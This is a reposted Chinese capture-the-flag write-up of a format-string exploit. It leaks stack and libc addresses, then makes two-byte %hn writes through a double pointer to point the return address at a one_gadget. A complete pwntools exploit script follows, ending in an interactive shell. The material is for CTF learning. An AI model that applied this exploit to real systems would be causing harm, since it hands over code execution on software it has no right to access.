本文共 1863 字,大约阅读时间需要 6 分钟。
vmapp
stack
retaddr
先泄漏能够泄漏的地址包括:当前站地址、libc地址
然后通过下面的指令进行地址写
#这里是只要覆盖偏移为12的地址值的后两个字节debug()offset0 = ret&0xffffpayload = '%'+str(offset0)+'c%12$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()#这里覆盖偏移为25的地址值的后两个字节offset1 = one&0xffffpayload = '%'+str(offset1) +'c%25$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()#修改的永远是指针指向的值#############################################payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()offset2 = 0xffff&(one>>16)payload = '%'+str(offset2) +'c%25$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')
修改流程
未修改前
第一次修改
第二次修改
第三次修改
注意!!!每次修改的值都是二级指针指向的值,不能直接修改
from pwn import *from LibcSearcher import *p = process('./pwn')#p = remote('neepusec.club',18757)elf = ELF('./pwn')context.log_level = 'debug'def debug(): gdb.attach(p) pause()payload = '\x00'p.sendlineafter(':\n',payload)p.send('aaaa%23$pbbbb%8$p')p.recvuntil('aaaa0x')__libc_start_main = int(p.recv(12),16)-231log.success('__libc_start_main===>'+hex(__libc_start_main))libc = LibcSearcher('__libc_start_main',__libc_start_main)libc_base = __libc_start_main - libc.dump('__libc_start_main')log.success('libc_base==>'+hex(libc_base))one = [0x4f3d5,0x4f432,0x10a41c]one = one[0]+libc_baselog.success('one==>'+hex(one))p.recvuntil('bbbb0x')ret = int(p.recv(12),16) + 8log.success('ret==>'+hex(ret))debug()offset0 = ret&0xffffpayload = '%'+str(offset0)+'c%12$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()offset1 = one&0xffffpayload = '%'+str(offset1) +'c%25$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()payload = '%'+str(offset0+2)+'c%12$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()offset2 = 0xffff&(one>>16)payload = '%'+str(offset2) +'c%25$hnxxxx\x00'p.sendline(payload)p.recvuntil('xxxx')debug()p.sendline('ls')p.interactive()
转载地址:http://htugf.baihongyu.com/